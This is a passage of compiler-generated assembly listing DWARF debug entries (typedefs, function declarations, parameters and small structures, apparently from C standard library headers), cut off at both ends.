.byte 45 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x21b1:0xb DW_TAG_typedef
.long 8574 # DW_AT_type
.long .Linfo_string270 # DW_AT_name
.byte 21 # DW_AT_decl_file
.byte 71 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x21bc:0xb DW_TAG_typedef
.long 6421 # DW_AT_type
.long .Linfo_string271 # DW_AT_name
.byte 21 # DW_AT_decl_file
.byte 73 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x21c7:0xb DW_TAG_typedef
.long 6421 # DW_AT_type
.long .Linfo_string272 # DW_AT_name
.byte 21 # DW_AT_decl_file
.byte 74 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x21d2:0xb DW_TAG_typedef
.long 6421 # DW_AT_type
.long .Linfo_string273 # DW_AT_name
.byte 21 # DW_AT_decl_file
.byte 75 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x21dd:0xb DW_TAG_typedef
.long 8680 # DW_AT_type
.long .Linfo_string275 # DW_AT_name
.byte 21 # DW_AT_decl_file
.byte 49 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x21e8:0xb DW_TAG_typedef
.long 8563 # DW_AT_type
.long .Linfo_string274 # DW_AT_name
.byte 3 # DW_AT_decl_file
.byte 53 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x21f3:0xb DW_TAG_typedef
.long 8702 # DW_AT_type
.long .Linfo_string277 # DW_AT_name
.byte 21 # DW_AT_decl_file
.byte 50 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x21fe:0xb DW_TAG_typedef
.long 8592 # DW_AT_type
.long .Linfo_string276 # DW_AT_name
.byte 3 # DW_AT_decl_file
.byte 55 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x2209:0xb DW_TAG_typedef
.long 8724 # DW_AT_type
.long .Linfo_string279 # DW_AT_name
.byte 21 # DW_AT_decl_file
.byte 51 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x2214:0xb DW_TAG_typedef
.long 3456 # DW_AT_type
.long .Linfo_string278 # DW_AT_name
.byte 3 # DW_AT_decl_file
.byte 57 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x221f:0xb DW_TAG_typedef
.long 8746 # DW_AT_type
.long .Linfo_string281 # DW_AT_name
.byte 21 # DW_AT_decl_file
.byte 52 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x222a:0xb DW_TAG_typedef
.long 8614 # DW_AT_type
.long .Linfo_string280 # DW_AT_name
.byte 3 # DW_AT_decl_file
.byte 59 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x2235:0xb DW_TAG_typedef
.long 8768 # DW_AT_type
.long .Linfo_string283 # DW_AT_name
.byte 21 # DW_AT_decl_file
.byte 102 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x2240:0xb DW_TAG_typedef
.long 6421 # DW_AT_type
.long .Linfo_string282 # DW_AT_name
.byte 3 # DW_AT_decl_file
.byte 73 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x224b:0xb DW_TAG_typedef
.long 6421 # DW_AT_type
.long .Linfo_string284 # DW_AT_name
.byte 21 # DW_AT_decl_file
.byte 90 # DW_AT_decl_line
.byte 36 # Abbrev [36] 0x2256:0x5 DW_TAG_structure_type
.long .Linfo_string285 # DW_AT_name
# DW_AT_declaration
.byte 68 # Abbrev [68] 0x225b:0x16 DW_TAG_subprogram
.long .Linfo_string286 # DW_AT_name
.byte 23 # DW_AT_decl_file
.byte 122 # DW_AT_decl_line
.long 3474 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2266:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 10 # Abbrev [10] 0x226b:0x5 DW_TAG_formal_parameter
.long 6689 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 73 # Abbrev [73] 0x2271:0xb DW_TAG_subprogram
.long .Linfo_string287 # DW_AT_name
.byte 23 # DW_AT_decl_file
.byte 125 # DW_AT_decl_line
.long 8828 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 39 # Abbrev [39] 0x227c:0x5 DW_TAG_pointer_type
.long 8790 # DW_AT_type
.byte 68 # Abbrev [68] 0x2281:0x11 DW_TAG_subprogram
.long .Linfo_string288 # DW_AT_name
.byte 24 # DW_AT_decl_file
.byte 108 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x228c:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x2292:0x11 DW_TAG_subprogram
.long .Linfo_string289 # DW_AT_name
.byte 24 # DW_AT_decl_file
.byte 109 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x229d:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x22a3:0x11 DW_TAG_subprogram
.long .Linfo_string290 # DW_AT_name
.byte 24 # DW_AT_decl_file
.byte 110 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x22ae:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x22b4:0x11 DW_TAG_subprogram
.long .Linfo_string291 # DW_AT_name
.byte 24 # DW_AT_decl_file
.byte 111 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x22bf:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x22c5:0x11 DW_TAG_subprogram
.long .Linfo_string292 # DW_AT_name
.byte 24 # DW_AT_decl_file
.byte 113 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x22d0:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x22d6:0x11 DW_TAG_subprogram
.long .Linfo_string293 # DW_AT_name
.byte 24 # DW_AT_decl_file
.byte 112 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x22e1:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x22e7:0x11 DW_TAG_subprogram
.long .Linfo_string294 # DW_AT_name
.byte 24 # DW_AT_decl_file
.byte 114 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x22f2:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x22f8:0x11 DW_TAG_subprogram
.long .Linfo_string295 # DW_AT_name
.byte 24 # DW_AT_decl_file
.byte 115 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2303:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x2309:0x11 DW_TAG_subprogram
.long .Linfo_string296 # DW_AT_name
.byte 24 # DW_AT_decl_file
.byte 116 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2314:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x231a:0x11 DW_TAG_subprogram
.long .Linfo_string297 # DW_AT_name
.byte 24 # DW_AT_decl_file
.byte 117 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2325:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x232b:0x11 DW_TAG_subprogram
.long .Linfo_string298 # DW_AT_name
.byte 24 # DW_AT_decl_file
.byte 118 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2336:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x233c:0x11 DW_TAG_subprogram
.long .Linfo_string299 # DW_AT_name
.byte 24 # DW_AT_decl_file
.byte 122 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2347:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x234d:0x11 DW_TAG_subprogram
.long .Linfo_string300 # DW_AT_name
.byte 24 # DW_AT_decl_file
.byte 125 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2358:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x235e:0x11 DW_TAG_subprogram
.long .Linfo_string301 # DW_AT_name
.byte 24 # DW_AT_decl_file
.byte 130 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2369:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x236f:0x12 DW_TAG_subprogram
.long .Linfo_string302 # DW_AT_name
.byte 26 # DW_AT_decl_file
.short 840 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x237b:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 20 # Abbrev [20] 0x2381:0xb DW_TAG_typedef
.long 9100 # DW_AT_type
.long .Linfo_string303 # DW_AT_name
.byte 26 # DW_AT_decl_file
.byte 62 # DW_AT_decl_line
.byte 74 # Abbrev [74] 0x238c:0x1 DW_TAG_structure_type
# DW_AT_declaration
.byte 20 # Abbrev [20] 0x238d:0xb DW_TAG_typedef
.long 9112 # DW_AT_type
.long .Linfo_string306 # DW_AT_name
.byte 26 # DW_AT_decl_file
.byte 70 # DW_AT_decl_line
.byte 57 # Abbrev [57] 0x2398:0x1e DW_TAG_structure_type
.byte 5 # DW_AT_calling_convention
.byte 16 # DW_AT_byte_size
.byte 26 # DW_AT_decl_file
.byte 66 # DW_AT_decl_line
.byte 46 # Abbrev [46] 0x239d:0xc DW_TAG_member
.long .Linfo_string304 # DW_AT_name
.long 6333 # DW_AT_type
.byte 26 # DW_AT_decl_file
.byte 68 # DW_AT_decl_line
.byte 0 # DW_AT_data_member_location
.byte 46 # Abbrev [46] 0x23a9:0xc DW_TAG_member
.long .Linfo_string305 # DW_AT_name
.long 6333 # DW_AT_type
.byte 26 # DW_AT_decl_file
.byte 69 # DW_AT_decl_line
.byte 8 # DW_AT_data_member_location
.byte 0 # End Of Children Mark
.byte 75 # Abbrev [75] 0x23b6:0x8 DW_TAG_subprogram
.long .Linfo_string307 # DW_AT_name
.byte 26 # DW_AT_decl_file
.short 591 # DW_AT_decl_line
# DW_AT_declaration
# DW_AT_external
# DW_AT_noreturn
.byte 60 # Abbrev [60] 0x23be:0x17 DW_TAG_subprogram
.long .Linfo_string308 # DW_AT_name
.byte 26 # DW_AT_decl_file
.short 586 # DW_AT_decl_line
.long 6409 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x23ca:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 10 # Abbrev [10] 0x23cf:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x23d5:0x12 DW_TAG_subprogram
.long .Linfo_string309 # DW_AT_name
.byte 26 # DW_AT_decl_file
.short 595 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x23e1:0x5 DW_TAG_formal_parameter
.long 9191 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 39 # Abbrev [39] 0x23e7:0x5 DW_TAG_pointer_type
.long 9196 # DW_AT_type
.byte 76 # Abbrev [76] 0x23ec:0x1 DW_TAG_subroutine_type
.byte 60 # Abbrev [60] 0x23ed:0x12 DW_TAG_subprogram
.long .Linfo_string310 # DW_AT_name
.byte 26 # DW_AT_decl_file
.short 600 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x23f9:0x5 DW_TAG_formal_parameter
.long 9191 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x23ff:0x11 DW_TAG_subprogram
.long .Linfo_string311 # DW_AT_name
.byte 29 # DW_AT_decl_file
.byte 25 # DW_AT_decl_line
.long 7544 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x240a:0x5 DW_TAG_formal_parameter
.long 6689 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x2410:0x12 DW_TAG_subprogram
.long .Linfo_string312 # DW_AT_name
.byte 26 # DW_AT_decl_file
.short 361 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x241c:0x5 DW_TAG_formal_parameter
.long 6689 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x2422:0x12 DW_TAG_subprogram
.long .Linfo_string313 # DW_AT_name
.byte 26 # DW_AT_decl_file
.short 366 # DW_AT_decl_line
.long 6333 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x242e:0x5 DW_TAG_formal_parameter
.long 6689 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x2434:0x25 DW_TAG_subprogram
.long .Linfo_string314 # DW_AT_name
.byte 30 # DW_AT_decl_file
.byte 20 # DW_AT_decl_line
.long 6409 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x243f:0x5 DW_TAG_formal_parameter
.long 9305 # DW_AT_type
.byte 10 # Abbrev [10] 0x2444:0x5 DW_TAG_formal_parameter
.long 9305 # DW_AT_type
.byte 10 # Abbrev [10] 0x2449:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 10 # Abbrev [10] 0x244e:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 10 # Abbrev [10] 0x2453:0x5 DW_TAG_formal_parameter
.long 9311 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 39 # Abbrev [39] 0x2459:0x5 DW_TAG_pointer_type
.long 9310 # DW_AT_type
.byte 77 # Abbrev [77] 0x245e:0x1 DW_TAG_const_type
.byte 52 # Abbrev [52] 0x245f:0xc DW_TAG_typedef
.long 9323 # DW_AT_type
.long .Linfo_string315 # DW_AT_name
.byte 26 # DW_AT_decl_file
.short 808 # DW_AT_decl_line
.byte 39 # Abbrev [39] 0x246b:0x5 DW_TAG_pointer_type
.long 9328 # DW_AT_type
.byte 78 # Abbrev [78] 0x2470:0x10 DW_TAG_subroutine_type
.long 5867 # DW_AT_type
.byte 10 # Abbrev [10] 0x2475:0x5 DW_TAG_formal_parameter
.long 9305 # DW_AT_type
.byte 10 # Abbrev [10] 0x247a:0x5 DW_TAG_formal_parameter
.long 9305 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x2480:0x17 DW_TAG_subprogram
.long .Linfo_string316 # DW_AT_name
.byte 26 # DW_AT_decl_file
.short 542 # DW_AT_decl_line
.long 6409 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x248c:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 10 # Abbrev [10] 0x2491:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x2497:0x17 DW_TAG_subprogram
.long .Linfo_string317 # DW_AT_name
.byte 26 # DW_AT_decl_file
.short 852 # DW_AT_decl_line
.long 9089 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x24a3:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 10 # Abbrev [10] 0x24a8:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 79 # Abbrev [79] 0x24ae:0xe DW_TAG_subprogram
.long .Linfo_string318 # DW_AT_name
.byte 26 # DW_AT_decl_file
.short 617 # DW_AT_decl_line
# DW_AT_declaration
# DW_AT_external
# DW_AT_noreturn
.byte 10 # Abbrev [10] 0x24b6:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 80 # Abbrev [80] 0x24bc:0xe DW_TAG_subprogram
.long .Linfo_string319 # DW_AT_name
.byte 26 # DW_AT_decl_file
.short 565 # DW_AT_decl_line
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x24c4:0x5 DW_TAG_formal_parameter
.long 6409 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x24ca:0x12 DW_TAG_subprogram
.long .Linfo_string320 # DW_AT_name
.byte 26 # DW_AT_decl_file
.short 634 # DW_AT_decl_line
.long 3474 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x24d6:0x5 DW_TAG_formal_parameter
.long 6689 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x24dc:0x12 DW_TAG_subprogram
.long .Linfo_string321 # DW_AT_name
.byte 26 # DW_AT_decl_file
.short 841 # DW_AT_decl_line
.long 6333 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x24e8:0x5 DW_TAG_formal_parameter
.long 6333 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x24ee:0x17 DW_TAG_subprogram
.long .Linfo_string322 # DW_AT_name
.byte 26 # DW_AT_decl_file
.short 854 # DW_AT_decl_line
.long 9101 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x24fa:0x5 DW_TAG_formal_parameter
.long 6333 # DW_AT_type
.byte 10 # Abbrev [10] 0x24ff:0x5 DW_TAG_formal_parameter
.long 6333 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x2505:0x12 DW_TAG_subprogram
.long .Linfo_string323 # DW_AT_name
.byte 26 # DW_AT_decl_file
.short 539 # DW_AT_decl_line
.long 6409 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2511:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x2517:0x17 DW_TAG_subprogram
.long .Linfo_string324 # DW_AT_name
.byte 26 # DW_AT_decl_file
.short 922 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2523:0x5 DW_TAG_formal_parameter
.long 6689 # DW_AT_type
.byte 10 # Abbrev [10] 0x2528:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x252e:0x1c DW_TAG_subprogram
.long .Linfo_string325 # DW_AT_name
.byte 26 # DW_AT_decl_file
.short 933 # DW_AT_decl_line
.long 6410 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x253a:0x5 DW_TAG_formal_parameter
.long 6480 # DW_AT_type
.byte 10 # Abbrev [10] 0x253f:0x5 DW_TAG_formal_parameter
.long 6684 # DW_AT_type
.byte 10 # Abbrev [10] 0x2544:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x254a:0x1c DW_TAG_subprogram
.long .Linfo_string326 # DW_AT_name
.byte 26 # DW_AT_decl_file
.short 925 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2556:0x5 DW_TAG_formal_parameter
.long 6480 # DW_AT_type
.byte 10 # Abbrev [10] 0x255b:0x5 DW_TAG_formal_parameter
.long 6684 # DW_AT_type
.byte 10 # Abbrev [10] 0x2560:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 80 # Abbrev [80] 0x2566:0x1d DW_TAG_subprogram
.long .Linfo_string327 # DW_AT_name
.byte 26 # DW_AT_decl_file
.short 830 # DW_AT_decl_line
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x256e:0x5 DW_TAG_formal_parameter
.long 6409 # DW_AT_type
.byte 10 # Abbrev [10] 0x2573:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 10 # Abbrev [10] 0x2578:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 10 # Abbrev [10] 0x257d:0x5 DW_TAG_formal_parameter
.long 9311 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 79 # Abbrev [79] 0x2583:0xe DW_TAG_subprogram
.long .Linfo_string328 # DW_AT_name
.byte 26 # DW_AT_decl_file
.short 623 # DW_AT_decl_line
# DW_AT_declaration
# DW_AT_external
# DW_AT_noreturn
.byte 10 # Abbrev [10] 0x258b:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 65 # Abbrev [65] 0x2591:0xc DW_TAG_subprogram
.long .Linfo_string329 # DW_AT_name
.byte 26 # DW_AT_decl_file
.short 453 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 60 # Abbrev [60] 0x259d:0x17 DW_TAG_subprogram
.long .Linfo_string330 # DW_AT_name
.byte 26 # DW_AT_decl_file
.short 550 # DW_AT_decl_line
.long 6409 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x25a9:0x5 DW_TAG_formal_parameter
.long 6409 # DW_AT_type
.byte 10 # Abbrev [10] 0x25ae:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 80 # Abbrev [80] 0x25b4:0xe DW_TAG_subprogram
.long .Linfo_string331 # DW_AT_name
.byte 26 # DW_AT_decl_file
.short 455 # DW_AT_decl_line
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x25bc:0x5 DW_TAG_formal_parameter
.long 3467 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x25c2:0x16 DW_TAG_subprogram
.long .Linfo_string332 # DW_AT_name
.byte 26 # DW_AT_decl_file
.byte 117 # DW_AT_decl_line
.long 7544 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x25cd:0x5 DW_TAG_formal_parameter
.long 6684 # DW_AT_type
.byte 10 # Abbrev [10] 0x25d2:0x5 DW_TAG_formal_parameter
.long 9688 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 63 # Abbrev [63] 0x25d8:0x5 DW_TAG_restrict_type
.long 9693 # DW_AT_type
.byte 39 # Abbrev [39] 0x25dd:0x5 DW_TAG_pointer_type
.long 3474 # DW_AT_type
.byte 68 # Abbrev [68] 0x25e2:0x1b DW_TAG_subprogram
.long .Linfo_string333 # DW_AT_name
.byte 26 # DW_AT_decl_file
.byte 176 # DW_AT_decl_line
.long 6333 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x25ed:0x5 DW_TAG_formal_parameter
.long 6684 # DW_AT_type
.byte 10 # Abbrev [10] 0x25f2:0x5 DW_TAG_formal_parameter
.long 9688 # DW_AT_type
.byte 10 # Abbrev [10] 0x25f7:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x25fd:0x1b DW_TAG_subprogram
.long .Linfo_string334 # DW_AT_name
.byte 26 # DW_AT_decl_file
.byte 180 # DW_AT_decl_line
.long 6421 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2608:0x5 DW_TAG_formal_parameter
.long 6684 # DW_AT_type
.byte 10 # Abbrev [10] 0x260d:0x5 DW_TAG_formal_parameter
.long 9688 # DW_AT_type
.byte 10 # Abbrev [10] 0x2612:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x2618:0x12 DW_TAG_subprogram
.long .Linfo_string335 # DW_AT_name
.byte 26 # DW_AT_decl_file
.short 784 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2624:0x5 DW_TAG_formal_parameter
.long 6689 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x262a:0x1c DW_TAG_subprogram
.long .Linfo_string336 # DW_AT_name
.byte 26 # DW_AT_decl_file
.short 936 # DW_AT_decl_line
.long 6410 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2636:0x5 DW_TAG_formal_parameter
.long 7190 # DW_AT_type
.byte 10 # Abbrev [10] 0x263b:0x5 DW_TAG_formal_parameter
.long 6536 # DW_AT_type
.byte 10 # Abbrev [10] 0x2640:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x2646:0x17 DW_TAG_subprogram
.long .Linfo_string337 # DW_AT_name
.byte 26 # DW_AT_decl_file
.short 929 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2652:0x5 DW_TAG_formal_parameter
.long 3474 # DW_AT_type
.byte 10 # Abbrev [10] 0x2657:0x5 DW_TAG_formal_parameter
.long 6473 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 20 # Abbrev [20] 0x265d:0xb DW_TAG_typedef
.long 9832 # DW_AT_type
.long .Linfo_string338 # DW_AT_name
.byte 26 # DW_AT_decl_file
.byte 80 # DW_AT_decl_line
.byte 57 # Abbrev [57] 0x2668:0x1e DW_TAG_structure_type
.byte 5 # DW_AT_calling_convention
.byte 16 # DW_AT_byte_size
.byte 26 # DW_AT_decl_file
.byte 76 # DW_AT_decl_line
.byte 46 # Abbrev [46] 0x266d:0xc DW_TAG_member
.long .Linfo_string304 # DW_AT_name
.long 3509 # DW_AT_type
.byte 26 # DW_AT_decl_file
.byte 78 # DW_AT_decl_line
.byte 0 # DW_AT_data_member_location
.byte 46 # Abbrev [46] 0x2679:0xc DW_TAG_member
.long .Linfo_string305 # DW_AT_name
.long 3509 # DW_AT_type
.byte 26 # DW_AT_decl_file
.byte 79 # DW_AT_decl_line
.byte 8 # DW_AT_data_member_location
.byte 0 # End Of Children Mark
.byte 79 # Abbrev [79] 0x2686:0xe DW_TAG_subprogram
.long .Linfo_string339 # DW_AT_name
.byte 26 # DW_AT_decl_file
.short 629 # DW_AT_decl_line
# DW_AT_declaration
# DW_AT_external
# DW_AT_noreturn
.byte 10 # Abbrev [10] 0x268e:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x2694:0x12 DW_TAG_subprogram
.long .Linfo_string340 # DW_AT_name
.byte 26 # DW_AT_decl_file
.short 844 # DW_AT_decl_line
.long 3509 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x26a0:0x5 DW_TAG_formal_parameter
.long 3509 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x26a6:0x17 DW_TAG_subprogram
.long .Linfo_string341 # DW_AT_name
.byte 26 # DW_AT_decl_file
.short 858 # DW_AT_decl_line
.long 9821 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x26b2:0x5 DW_TAG_formal_parameter
.long 3509 # DW_AT_type
.byte 10 # Abbrev [10] 0x26b7:0x5 DW_TAG_formal_parameter
.long 3509 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x26bd:0x12 DW_TAG_subprogram
.long .Linfo_string342 # DW_AT_name
.byte 26 # DW_AT_decl_file
.short 373 # DW_AT_decl_line
.long 3509 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x26c9:0x5 DW_TAG_formal_parameter
.long 6689 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x26cf:0x1b DW_TAG_subprogram
.long .Linfo_string343 # DW_AT_name
.byte 26 # DW_AT_decl_file
.byte 200 # DW_AT_decl_line
.long 3509 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x26da:0x5 DW_TAG_formal_parameter
.long 6684 # DW_AT_type
.byte 10 # Abbrev [10] 0x26df:0x5 DW_TAG_formal_parameter
